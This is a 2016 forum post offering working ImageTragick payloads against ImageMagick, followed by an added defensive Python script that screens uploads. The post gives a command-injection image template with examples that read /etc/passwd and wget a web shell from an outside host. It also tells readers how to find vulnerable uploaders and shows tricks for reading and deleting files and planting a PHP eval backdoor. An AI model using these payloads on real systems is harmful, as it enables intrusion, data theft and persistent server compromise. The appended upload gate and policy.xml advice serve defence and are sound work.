Jako Posted September 7, 2016 (edited)

I know this has been discussed on the forum before, but maybe the information is useful to someone.

Should work for all image files (.jpg/.mvg/.svg/.png/etc.)

Exploit image contents:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg "|YOUR COMMAND HERE")'
    pop graphic-context

Example image:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg "|cat /etc/passwd")'
    pop graphic-context

More examples:

Example #1:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg "|cat /etc/passwd")'
    pop graphic-context

Example #2:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg "|ls -la")'
    pop graphic-context

Example #3:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg "|wget -O shell.php http://site.com/shell.txt")'
    pop graphic-context

HOW TO:

1. Find an image uploader that uses ImageMagick to process images. (Try it @ http://attack32.samsclass.info/im.htm)
2. Craft a malicious image file.
3. If it is running a vulnerable version, you'll have full RCE!

TRICKS:

1. It's possible to read arbitrary files from a web server by uploading an ImageMagick Vector Graphics file (MVG) that the web application processes with ImageMagick:

    push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'label:@/etc/passwd'
    pop graphic-context

As is the case with all of these vulnerabilities, the file doesn't need to be uploaded with a .mvg extension. You can change it to .png, .jpg, or anything else. If the file doesn't exist, you'll see the @ symbol plus the filename as the output.

2. You can use a similar technique to delete a file, provided ImageMagick is built with support for its ephemeral protocol:

    push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'ephemeral:/var/www/index.php'
    pop graphic-context

3. You can move files around, provided you're able to determine the location of uploaded files. This can be used to upload new files as well as overwrite existing files.

first_image.png:

    <?xml version="1.0" encoding="UTF-8"?>
    <image>
      <read filename="/var/www/uploads/second_image.png"/>
      <write filename="/var/www/hi.php"/>
    </image>

second_image.png:

    push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'label:<?php if($_SERVER["REQUEST_METHOD"]=="POST")eval(file_get_contents("php://input")); ?>' 
    pop graphic-context

third_image.png:

    push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'msl:/var/www/uploads/first_image.png'
    pop graphic-context

Additional info can be read here.

HAVE FUN!

Edited September 7, 2016 by Jako
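As an added example (not from Jako's post, and not a patch for ImageMagick itself), here is the defensive side of the same trick: a Python gate an upload handler can run before handing a file to ImageMagick. It assumes the uploader only accepts PNG/JPEG/GIF, verifies that the leading bytes really are that format (the post's point is that a ".png" containing MVG text is still parsed as MVG, because ImageMagick sniffs content), and then looks for the exact primitives the payloads above depend on: `url("|cmd")`, `label:@`, `ephemeral:`, `msl:` and MSL `<read>`/`<write>`. The sample files are constructed inline from the post's payloads so the script runs offline.

```python
# Added example: a pre-ImageMagick upload gate (not part of the original post).
# 1. Compare the claimed extension with the file's magic bytes.
# 2. Grep the bytes for the coder/delegate primitives used by ImageTragick-style
#    payloads.  Either failure rejects the upload before ImageMagick sees it.
import re
from typing import Dict, List, Optional

# Magic bytes for the raster formats this (assumed) uploader accepts.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# Indicators matching the payloads in the post above.
PATTERNS = {
    # fill 'url(https://... "|cmd")' -> command reaches the shell via the https delegate
    "url_pipe": re.compile(rb'url\(\s*[^)]*"\s*\|', re.I),
    # label:@/etc/passwd -> local file contents rendered into the output image
    "label_read": re.compile(rb"label:@", re.I),
    # ephemeral:/path -> file is deleted after being read
    "ephemeral": re.compile(rb"ephemeral:", re.I),
    # msl:/path -> MSL script is executed
    "msl": re.compile(rb"msl:", re.I),
    # MSL <read filename=...>/<write filename=...> -> arbitrary file copy
    "msl_xml": re.compile(rb"<(read|write)\s+filename=", re.I),
    # MVG text where a raster image was expected
    "mvg_header": re.compile(rb"^\s*push\s+graphic-context", re.I | re.M),
}


def sniff(data: bytes) -> Optional[str]:
    """Return the raster format implied by the leading bytes, or None."""
    for magic, fmt in MAGIC.items():
        if data.startswith(magic):
            return fmt
    return None


def scan(data: bytes, claimed_ext: str) -> Dict[str, object]:
    """Decide whether an upload may be handed to ImageMagick."""
    ext = claimed_ext.lower().lstrip(".")
    ext = {"jpeg": "jpg"}.get(ext, ext)
    fmt = sniff(data)
    hits: List[str] = [name for name, rx in PATTERNS.items() if rx.search(data)]
    return {
        "magic_format": fmt,
        "extension_matches_magic": fmt == ext,
        "indicators": hits,
        "accept": fmt == ext and not hits,
    }


# Constructed samples: the post's payloads saved with a .png name, plus a
# minimal genuine PNG header (not a real image, just the signature + IHDR tag).
SAMPLES = {
    "rce.png": (b"push graphic-context\nviewbox 0 0 640 480\n"
                b"fill 'url(https://example.com/image.jpg \"|cat /etc/passwd\")'\n"
                b"pop graphic-context\n"),
    "read.png": (b"push graphic-context\nviewbox 0 0 1024 1024\n"
                 b"image over 0,0 0,0 'label:@/etc/passwd'\npop graphic-context\n"),
    "delete.png": (b"push graphic-context\nviewbox 0 0 1024 1024\n"
                   b"image over 0,0 0,0 'ephemeral:/var/www/index.php'\npop graphic-context\n"),
    "first_image.png": (b'<?xml version="1.0" encoding="UTF-8"?>\n<image>\n'
                        b'<read filename="/var/www/uploads/second_image.png"/>\n'
                        b'<write filename="/var/www/hi.php"/>\n</image>\n'),
    "third_image.png": (b"push graphic-context\nviewbox 0 0 1024 1024\n"
                        b"image over 0,0 0,0 'msl:/var/www/uploads/first_image.png'\n"
                        b"pop graphic-context\n"),
    "clean.png": b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17,
}


def scan_samples() -> Dict[str, Dict[str, object]]:
    """Run the gate over every constructed sample, keyed by file name."""
    return {name: scan(data, name.rsplit(".", 1)[1]) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, result in scan_samples().items():
        verdict = "ACCEPT" if result["accept"] else "REJECT"
        print(f"{name:18} {verdict:6} magic={result['magic_format']} "
              f"indicators={result['indicators']}")
```

The pattern grep is a heuristic, not a fix: the real mitigation is an ImageMagick version that is not affected plus a policy.xml that denies the coders involved (for example `<policy domain="coder" rights="none" pattern="MVG"/>` and the same for MSL, EPHEMERAL, URL, HTTPS, HTTP, LABEL and TEXT), so that even a file that slips past the gate cannot reach a delegate or the filesystem. The magic check is the part worth keeping regardless, since every payload in the post works precisely because the extension is never compared with the content.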